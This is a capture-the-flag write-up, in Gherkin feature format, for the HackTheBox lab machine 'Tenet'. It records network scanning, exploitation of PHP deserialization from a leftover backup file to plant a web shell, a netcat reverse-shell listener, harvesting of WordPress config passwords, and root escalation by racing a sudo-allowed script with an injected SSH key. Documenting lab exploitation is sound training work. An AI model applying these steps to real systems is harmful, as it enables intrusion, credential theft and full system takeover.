## Version 2.0
## language: en

Feature: tenet-HackTheBox

  Site:
    www.hackthebox.eu
  User:
    thecyberpunker
  Goal:
    Get user system own

 Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | Nmap            | 7.9.1     |
    | Vmware 16 pro   | 16.1.0    |
    | Ubuntu          | 20.4.2.0  |
    | Google Chrome   | 89.0.4    |
    | OpenSSH         | 8.4p1     |

  Machine information:
    Given I am accessing the challenge through the URL
    """
    https://app.hackthebox.eu/machines/Tenet
    """
    When I visit the IP address 10.10.10.223 [evidence](1.png)
    Then I see a website title "Apache2 Ubuntu Default Page"
    And I scan it with "nmap 10.10.10.223"
    And I get information about the open ports [evidence](2.png)

  Scenario: Success: Exploit the website
    Given I have some information about the website
    When I verify the running services with a Nmap command
    """
    nmap -sT -sV -sC -Pn -v -oA enum 10.10.10.223
    """
    Then I get some information [evidence](3.png)
    And I realize about two open ports
    """
    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
    80/tcp open http Apache httpd 2.4.29 (Ubuntu)
    """
    Then I add the domain "tenet.htb" to my "/etc/hosts"
    And I visit the url "tenet.htb"
    And I see a Wordpress website [evidence](4.png)
    When I read the Wordpress website content
    Then I realize about a tip [evidence](5.png)
    """
    did you remove the sator php file and the backup??
    the migration program is incomplete! why would you do this?!
    """
    Then I add "sator.tenet.htb" to my "/etc/hosts"
    And I go to "http://sator.tenet.htb/"
    When I visit the webpage "sator.tenet.htb"
    And I see a new message [evidence](6.png)
    And I go to the file "sator.php"
    And I download the file "sator.php.bak"
    When I read the content file [evidence](7.png)
    And I realize about a PHP code vulnerable to serialization

  Scenario: Success: Exploiting PHP deserialization
    Given the information of the ".bak" file
    And I modify the PHP code[evidence](8.png)
    Then I execute the code  "php lab.php"
    And I get a string [evidence](9.png)
    And I inject the new string to the url
    """
    http://sator.tenet.htb/sator.php?arepo=string
    """
    Then I put a Netcat session to listen mode
    """
    nc -nlvp 4444
    """
    When I visit the url with my shell "http://sator.tenet.htb/mago.php"
    And I get a Reverse Shell [evidence](10.png)
    And I realize about some Wordpress files "wp-config.php"
    When I see the file content [evidence](11.png)
    And I realize about some passwords

  Scenario: Success: Perform Privilege Scalation
    Given the username and password
    When I try to start a ssh session
    And I got access to "neil" [evidence](12.png)
    When I list the files in the directory
    And I see a file "user.txt"
    Then I get the first flag [evidence](13.png)
    When I run "sudo -l"
    And I can see a file that can run as root [evidence](14.png)
    """
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
    """
    And I edit the file "enableSSH.sh" with my own SSH key
    """
    while true
    do
    echo "rsa_key" | tee /tmp/ssh-*
    done
    """
    Then I run in another terminal the script "ensableSSH.sh"
    """
    while true; do sudo /usr/local/bin/enableSSH.sh; done >/dev/null
    """
    And I run a new SSH session
    And I got root permissions [evidence](15.png)
    And I got the root flag [evidence](16.png)
